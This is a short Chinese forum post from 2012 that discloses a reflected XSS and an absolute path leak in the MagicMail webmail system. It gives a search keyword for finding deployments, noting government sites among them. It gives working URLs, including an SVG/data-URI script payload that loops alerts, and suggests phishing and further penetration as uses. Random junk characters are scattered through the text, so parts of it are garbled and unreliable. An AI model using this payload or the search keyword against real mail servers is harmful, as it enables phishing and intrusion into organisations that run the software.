今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞4 P* m# P( c! N+ \% b. J# h
& O6 X. P; G6 v1 Q
; k/ t) e" n; b包含 一个反射性XSS 以及 绝对路径泄漏" }* x+ e( e; r+ L$ o* @
看了看 貌似全部是linux的。$ m6 H+ [ T7 S$ H
7 \' o) Y" p( z, O5 T关键字:迈捷邮件系统 by MagicMail4 `9 c( Y, y6 U
8 e$ w# W2 `1 I! P/ Z$ v) `! a可以看到很多政府网站都用这个邮件系统
m8 ]7 d+ A A, z+ m) d# V
1 z. i* @/ _) `, q9 V绝对路径 http://madman.in/index.php?login_type=declare&language=
- o6 \) D4 b5 a7 k0 E$ D0 T( I# Y' }: t0 A
3 @0 B' t% K4 V* d: A4 q
K; P% f5 i$ p4 h% k r% xXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
?1 N/ w7 _4 C' {: d* O Q+ L$ x% j- T1 J
- d! M, R% K! [6 ~) a" ?- h3 F$ ~. }1 B# b4 Q. q5 f
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
5 }; w) z& r8 o" E
9 U2 p+ z% j3 I5 ]/ J* T修复方案:看官方补丁吧。
8 n" ^' Q) X3 `+ z+ Y |
发表于 2012-11-9 20:38:41
收藏
支持
反对